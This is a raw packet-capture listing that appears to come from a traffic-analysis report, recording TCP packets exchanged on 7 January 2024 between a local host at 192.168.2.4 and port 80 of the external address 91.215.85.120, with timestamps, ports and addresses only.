                                                                                                                                                                    Jan 7, 2024 05:29:45.442923069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.442964077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.442994118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.497296095 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.501235008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.501274109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.501322031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.501326084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.501368046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.501400948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.530735016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.569746017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.569767952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.569792986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.569797993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.569818020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.569832087 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.569905043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.569940090 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.569961071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.622836113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.622884989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.622982025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.623014927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.623055935 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.623114109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.628647089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.628689051 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.628752947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.631659031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.631700993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.631831884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.637531996 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.637569904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.637579918 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.690902948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.690944910 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.690952063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.695034981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.695046902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.695079088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.695096016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.695137024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.695205927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.763705015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.763720989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.763753891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.763775110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.763813019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.763854027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.763978958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.764014006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.764071941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.817368031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.817404032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.817410946 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.817475080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.817490101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.817523003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.823126078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.823175907 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.823184013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.825788975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.825800896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.825838089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.831775904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.831789970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.831819057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.886406898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.886442900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.886459112 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.886481047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.886519909 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.890433073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.890609980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.890651941 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.890677929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.890748978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.890799999 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.959023952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.959038973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.959100962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.959137917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.959216118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.959249020 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:45.959281921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.959357023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:45.959389925 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.011547089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.011668921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.011730909 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.011742115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.011805058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.011841059 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.016963959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.017178059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.017219067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.019526958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.019617081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.019660950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.025789022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.025841951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.025883913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.080487967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.080533028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.080570936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.080679893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.080790997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.080836058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.084439993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.084530115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.084582090 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.084594011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.084669113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.084707975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.154396057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.154481888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.154531956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.154597998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.154665947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.154757023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.154798031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.154886007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.154928923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.154989004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.155056000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.155416965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.206604958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.206625938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.206660986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.206691027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.206710100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.206753016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.211961031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.212034941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.212089062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.214282036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.214349031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.214394093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.220525026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.220601082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.220648050 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.274492979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.274540901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.274593115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.274629116 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.278260946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.278364897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.278434992 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.278465986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.278520107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.278532982 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.349277973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349323034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349349976 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.349458933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349526882 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.349556923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349642992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349677086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349697113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.349729061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349766970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.349773884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349843025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349895000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.349934101 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.400413036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.400446892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.400460958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.400475025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.400516033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.400587082 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.405683041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.405698061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.405800104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.408128023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.408140898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.408226013 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.414238930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.414254904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.414313078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.468787909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.468805075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.468861103 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.472307920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.472325087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.472340107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.472354889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.472387075 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.472400904 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.543179989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543313980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543415070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543467999 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.543591022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543632984 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.543673038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543788910 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543829918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543879032 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.543900967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.543939114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.543972969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.544014931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.544101954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.544188976 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.544256926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.544306040 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.595920086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.595937967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.595999002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.596010923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.596988916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.597438097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.600126028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.600210905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.600296974 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.602107048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.602157116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.602200031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.607945919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.608057022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.608134031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.664092064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.664202929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.666701078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.667227030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.667320967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.667402983 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.667433023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.667527914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.667618990 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.739458084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739491940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739506006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739518881 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739594936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.739656925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739670992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739727974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739741087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739762068 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.739762068 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.739784956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.739804983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739818096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739851952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.739873886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.739918947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.743452072 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.790894032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.790916920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.790982962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.792243004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.792345047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.792524099 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.794929981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.794960976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.795027018 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.797214031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.797240973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.797298908 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.803080082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.803118944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.803169012 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.861685038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.861706018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.861757040 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.862325907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.862340927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.862385988 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.862423897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.862497091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.863483906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.934503078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934535027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934550047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934564114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934600115 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.934622049 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.934680939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934720039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934797049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934839964 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.934910059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934957027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.934962988 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.934993982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.935117960 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.937951088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.938028097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.938133001 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:46.984774113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.984797001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:46.984867096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:47.292064905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:47.292107105 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:47.485742092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:47.501848936 CET804973591.215.85.120192.168.2.4
